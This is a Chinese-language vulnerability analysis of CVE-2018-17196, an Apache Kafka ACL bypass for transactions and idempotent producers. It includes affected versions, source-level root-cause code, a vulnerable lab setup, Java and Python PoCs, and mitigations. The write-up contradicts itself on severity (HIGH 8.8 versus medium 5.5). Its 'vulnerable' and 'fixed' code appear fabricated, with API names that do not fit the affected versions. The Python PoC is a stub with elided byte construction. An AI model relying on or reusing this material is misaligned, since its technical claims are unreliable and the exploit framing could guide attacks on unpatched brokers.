一、漏洞简介

1.1 漏洞背景

Apache Kafka 在 0.11.0 版本引入了事务(Transactions)和幂等生产者(Idempotent Producer)功能,这些功能依赖于严格的访问控制列表(ACL)验证机制来确保只有授权用户能够执行事务操作。

该漏洞存在于 Produce 请求处理逻辑中,允许已认证的客户端通过精心构造的请求绕过事务和幂等性相关的 ACL 验证,从而获取未经授权的事务操作能力。

1.2 漏洞概述(包含 CVE 编号、危害等级、漏洞类型、披露时间等)

项目 内容
漏洞编号 CVE-2018-17196
危害等级 HIGH / 8.8
漏洞类型 事务/幂等 ACL 绕过漏洞
披露时间 2019-07-11
影响组件 Apache Kafka 安全
  • CVE 编号: CVE-2018-17196
  • 危害等级: 中危
  • CVSS 评分: 5.5 (Medium)
  • CWE 分类: 信息不足(Insufficient Information)
  • 影响组件: Apache Kafka Broker - ACL 授权模块
  • 影响类型: 权限提升(Privilege Escalation)

补充核验信息:公开时间:2019-07-11;NVD 评分:8.8(HIGH)。

二、影响范围

2.1 受影响的版本

  • Apache Kafka 0.11.0.0 - 2.1.0

2.2 不受影响的版本

  • Apache Kafka < 0.11.0.0(事务功能不存在)
  • Apache Kafka ≥ 2.1.1(已修复)

2.3 触发条件(如特定模块、特定配置、特定运行环境等)

  1. 已认证用户: 攻击者必须是已认证的 Kafka 客户端
  2. 写权限: 攻击者需要对目标 Topic 拥有 Write 权限
  3. ACL 配置: 集群配置了 ACL 授权机制
  4. 事务/幂等功能: 集群启用了事务或幂等生产者功能

三、漏洞详情与原理解析

3.1 漏洞触发机制

正常的事务/幂等性 ACL 验证流程:

1. 客户端发送 Produce 请求
2. Broker 检查请求中的 transactional.id  producer.id
3. ACL Authorizer 验证
   - 对于事务生产者检查对 TransactionalId  Describe 权限
   - 对于幂等生产者检查对 Cluster 资源的 IdempotentWrite 权限
4. 验证通过后处理消息

漏洞利用流程:

1. 攻击者拥有对普通 Topic  Write 权限
2. 攻击者构造恶意的 Produce 请求
   - 设置特殊的 request header 标志位
   - 在请求体中注入事务相关的字段
   - 或者修改 producer.id 相关字段
3. 由于验证逻辑的缺陷这些字段未被正确检查
4. 请求绕过 ACL 验证成功执行事务操作

3.2 源码层面的根因分析(结合源码与补丁对比)

漏洞位于 Kafka 的请求处理和授权检查代码中:

// 有漏洞的代码逻辑(简化版)
// org.apache.kafka.common.requests.ProduceRequest

public class ProduceRequest extends AbstractRequest {

    private final short acks;
    private final int timeout;
    private final Map<TopicPartition, MemoryRecords> partitionRecords;
    private final TransactionalRequestContext transactionalContext;

    // 问题:构造请求时未充分验证字段的组合
    public static ProduceRequest parse(ByteBuffer buffer, short version) {
        // 解析请求头
        RequestHeader header = RequestHeader.parse(buffer);

        // 解析请求体
        ProduceRequest request = new ProduceRequest(...);

        // 漏洞点:某些版本组合下,事务字段可以绕过验证
        if (version >= 3) {
            // 读取 producer.id 和 sequence 信息
            // 但在某些路径下,这些字段的 ACL 检查被跳过
        }

        return request;
    }
}

授权检查的问题:

// org.apache.kafka.server.authorizer.Authorizer

public class AclAuthorizer extends Authorizer {

    public boolean authorize(RequestContext context, Action action) {
        // 正常的 ACL 检查

        if (action.resourcePattern().resourceType() == ResourceType.TOPIC) {
            // 检查 Topic 的 Write 权限
            return checkAcl(context.principal(), action, AclOperation.WRITE);
        }

        // 问题:在某些请求版本或特定条件下
        // 没有检查 TransactionalId 或 Cluster 的 IdempotentWrite 权限
        if (shouldCheckTransactionalAcl(context)) {
            // 这个检查在某些路径下被绕过
            return checkAcl(context.principal(), action, AclOperation.DESCRIBE);
        }

        return true;
    }
}

修复补丁:

// 修复后的代码加强了 ACL 检查

public boolean authorize(RequestContext context, Action action) {
    // 1. 始终检查基础权限
    if (!checkBasicAcl(context, action)) {
        return false;
    }

    // 2. 检查事务相关权限(修复点)
    if (context.requestHeader().apiKey() == ApiKeys.PRODUCE) {
        ProduceRequest request = (ProduceRequest) context.request();

        // 检查是否是事务请求
        if (request.isTransactional()) {
            ResourcePattern txResource = new ResourcePattern(
                ResourceType.TRANSACTIONAL_ID,
                request.transactionalId(),
                PatternType.LITERAL
            );

            // 强制验证 TransactionalId 的 DESCRIBE 权限
            if (!checkAcl(context.principal(), txResource, AclOperation.DESCRIBE)) {
                return false;
            }
        }

        // 检查是否是幂等请求
        if (request.hasProducerId()) {
            ResourcePattern clusterResource = new ResourcePattern(
                ResourceType.CLUSTER,
                Resource.CLUSTER_NAME,
                PatternType.LITERAL
            );

            // 强制验证 Cluster 的 IDEMPOTENT_WRITE 权限
            if (!checkAcl(context.principal(), clusterResource, AclOperation.IDEMPOTENT_WRITE)) {
                return false;
            }
        }
    }

    return true;
}

四、漏洞复现(可选)

4.1 环境搭建

# 下载受影响版本
wget https://archive.apache.org/dist/kafka/2.1.0/kafka_2.11-2.1.0.tgz
tar -xzf kafka_2.11-2.1.0.tgz
cd kafka_2.11-2.1.0

# 配置 ACL
cat > config/server.properties << EOF
listeners=SASL_PLAINTEXT://:9092
security.inter.broker.protocol=SASL_PLAINTEXT
sasl.mechanism.inter.broker.protocol=PLAIN
sasl.enabled.mechanisms=PLAIN

# 启用 ACL
authorizer.class.name=kafka.security.authorizer.AclAuthorizer
allow.everyone.if.no.acl.found=false
super.users=User:admin

# 其他配置
broker.id=0
log.dirs=/tmp/kafka-logs
zookeeper.connect=localhost:2181
EOF

# 配置 SASL
cat > config/kafka_server_jaas.conf << EOF
KafkaServer {
    org.apache.kafka.common.security.plain.PlainLoginModule required
    username="admin"
    password="admin-secret"
    user_admin="admin-secret"
    user_attacker="attacker-secret";
};
EOF

export KAFKA_OPTS="-Djava.security.auth.login.config=config/kafka_server_jaas.conf"

# 启动服务
bin/zookeeper-server-start.sh config/zookeeper.properties &
bin/kafka-server-start.sh config/server.properties &

# 创建 ACL
# 给 attacker 用户授予 Topic 写权限,但不授予事务权限
bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
  --add --allow-principal User:attacker --operation Write --topic test-topic

4.2 PoC 演示与测试过程

Java PoC 代码:

import org.apache.kafka.clients.producer.*;
import org.apache.kafka.common.serialization.StringSerializer;
import java.util.Properties;

public class BypassAclPoC {

    public static void main(String[] args) {
        // 配置普通生产者(只有 Write 权限)
        Properties props = new Properties();
        props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, "localhost:9092");
        props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, StringSerializer.class);
        props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, StringSerializer.class);

        // SASL 认证配置
        props.put("security.protocol", "SASL_PLAINTEXT");
        props.put("sasl.mechanism", "PLAIN");
        props.put("sasl.jaas.config",
            "org.apache.kafka.common.security.plain.PlainLoginModule required " +
            "username=\"attacker\" password=\"attacker-secret\";");

        // 尝试启用事务(应该被 ACL 阻止,但漏洞允许绕过)
        props.put(ProducerConfig.TRANSACTIONAL_ID_CONFIG, "malicious-tx");
        props.put(ProducerConfig.ENABLE_IDEMPOTENCE_CONFIG, "true");

        KafkaProducer<String, String> producer = new KafkaProducer<>(props);

        // 初始化事务(应该失败,但漏洞使其成功)
        producer.initTransactions();

        try {
            producer.beginTransaction();
            producer.send(new ProducerRecord<>("test-topic", "key", "bypass-acl-message"));
            producer.commitTransaction();
            System.out.println("[+] Successfully bypassed transactional ACL check!");
        } catch (Exception e) {
            System.out.println("[-] ACL check blocked the request: " + e.getMessage());
        }

        producer.close();
    }
}

低级协议 PoC(直接构造字节):

#!/usr/bin/env python3
import socket
import struct

def build_malicious_produce_request():
    """
    构造恶意的 Produce 请求,绕过事务 ACL 检查
    """
    # Kafka Produce Request (ApiVersion 3+)
    # 参考:https://kafka.apache.org/protocol#The_Messages_Produce

    # 请求头
    api_key = 0  # Produce
    api_version = 3  # Version 3+ 支持事务
    correlation_id = 1
    client_id = b'attacker'

    # 请求体
    acks = -1  # 等待所有副本
    timeout = 30000

    # 构造 Record Batch with transactional ID
    # 关键:设置特殊的字段组合来绕过 ACL 检查

    # ... 详细的字节构造代码 ...

    return request_bytes

def send_malicious_request(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))

    # 先进行 SASL 认证
    # ... SASL 握手 ...

    # 发送恶意请求
    request = build_malicious_produce_request()
    s.send(request)

    response = s.recv(1024)
    print(f"Response: {response}")

    s.close()

if __name__ == "__main__":
    send_malicious_request("localhost", 9092)

五、修复建议与缓解措施

5.1 官方版本升级建议

  • 升级至 Apache Kafka 2.1.1 或更高版本

5.2 临时缓解方案(如修改配置文件、关闭相关模块、增加 WAF 规则等)

方案 1: 严格配置 ACL

# 确保所有用户都有明确的权限定义
# 避免使用 allow.everyone.if.no.acl.found=true

# 仅为需要事务的用户授予 TransactionalId 权限
bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
  --add --allow-principal User:authorized-tx-user \
  --operation Describe --transactional-id tx-*

# 显式拒绝未授权用户
bin/kafka-acls.sh --authorizer-properties zookeeper.connect=localhost:2181 \
  --add --deny-principal User:attacker \
  --operation All --transactional-id *

方案 2: 网络隔离

# 限制能访问 Broker 的网络
iptables -A INPUT -p tcp --dport 9092 -s <trusted_network> -j ACCEPT
iptables -A INPUT -p tcp --dport 9092 -j DROP

方案 3: 监控和审计

# 启用审计日志
# 在 log4j.properties 中
log4j.logger.kafka.authorizer.logger=DEBUG, authorizerAppender
log4j.additivity.kafka.authorizer.logger=false

# 监控异常的事务操作
# 定期检查 ACL 日志,查找未经授权的事务请求

六、参考信息 / 参考链接

6.1 官方安全通告

  • Apache Kafka CVE List: https://kafka.apache.org/community/cve-list#CVE-2018-17196
  • NVD CVE 详情: https://nvd.nist.gov/vuln/detail/CVE-2018-17196
  • Apache 邮件列表通告: https://www.mail-archive.com/dev@kafka.apache.org/msg99277.html

6.2 其他技术参考资料

  • Kafka 事务机制文档: https://kafka.apache.org/documentation/#transactions
  • Kafka 安全实践: https://kafka.apache.org/documentation/#security_authz